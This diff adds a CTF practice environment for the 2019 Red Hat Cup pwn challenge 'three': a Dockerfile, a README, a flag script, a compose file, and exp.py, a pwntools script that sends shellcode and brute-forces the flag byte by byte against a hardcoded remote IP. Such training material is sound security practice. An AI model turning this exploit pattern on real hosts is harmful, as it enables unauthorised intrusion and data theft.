ok

Dockerfile

@@ -0,0 +1,8 @@
+FROM ctftraining/base_pwn_xinetd
+
+COPY _files/flag.sh /flag.sh
+COPY src/pwn /home/ctf/pwn
+
+RUN chown root:ctf /home/ctf/pwn && \
+    chmod 750 /home/ctf/pwn && \
+    apt-get clean && rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*

README.md

@@ -0,0 +1,22 @@
+# 2019红帽杯 pwn three
+
+## 题目详情
+
+- **Redhat_2019_pwn_three**
+- **shellcode**
+
+## 考点
+
+- shellcode
+- 爆破
+
+## 启动
+
+```
+docker-compose up -d
+nc 127.0.0.1 10001
+```
+
+## 版权
+
+该题目复现环境尚未取得主办方及出题人相关授权，如果侵权，请联系本人删除（ [email protected]）

_files/flag.sh

@@ -0,0 +1,10 @@
+#!/bin/bash
+
+echo $FLAG > /home/ctf/flag
+
+chmod 444 /home/ctf/flag
+
+export FLAG=not_flag
+FLAG=not_flag
+
+rm -f /flag.sh

docker-compose.yml

@@ -0,0 +1,15 @@
+version: "2"
+services:
+
+  pwn:
+    build:
+      context: .
+      dockerfile: Dockerfile
+    image: ctftraining/suctf_2019_pwn_oldpc
+    volumes:
+      - ./tcpdump:/var/lib/tcpdump
+    ports:
+      - "10001:10000"
+    environment:
+      - FLAG=ctftraining{welcome_to_ctftraining}
+      - TCPDUMP_ENABLE=0

exp.py

@@ -0,0 +1,30 @@
+from pwn import *
+#p=process("./pwn")
+
+def create(index,content):
+	p=remote("47.104.190.38", 12001)
+	p.sendlineafter("Give me a index:\n",str(index))
+	shellcode = asm("mov eax,dword ptr[ecx];ret")
+	p.sendafter("Three is good number,I like it very much!\n",shellcode)
+	p.sendlineafter('Leave you name of size:\n','2')
+	p.sendafter("Tell me:\n",p8(content))
+	tmp= p.recvuntil('\n')
+	p.close()
+	if '1' in tmp:
+		print 'yes'
+		return True
+	else:
+		return False
+
+idx=0
+flag=''
+while "}" not in flag:
+	for i in range(256):
+		b=create(idx,i)
+		if b:
+			idx+=1
+			flag+=chr(i)
+			print flag
+			break;
+print flag
+p.interactive()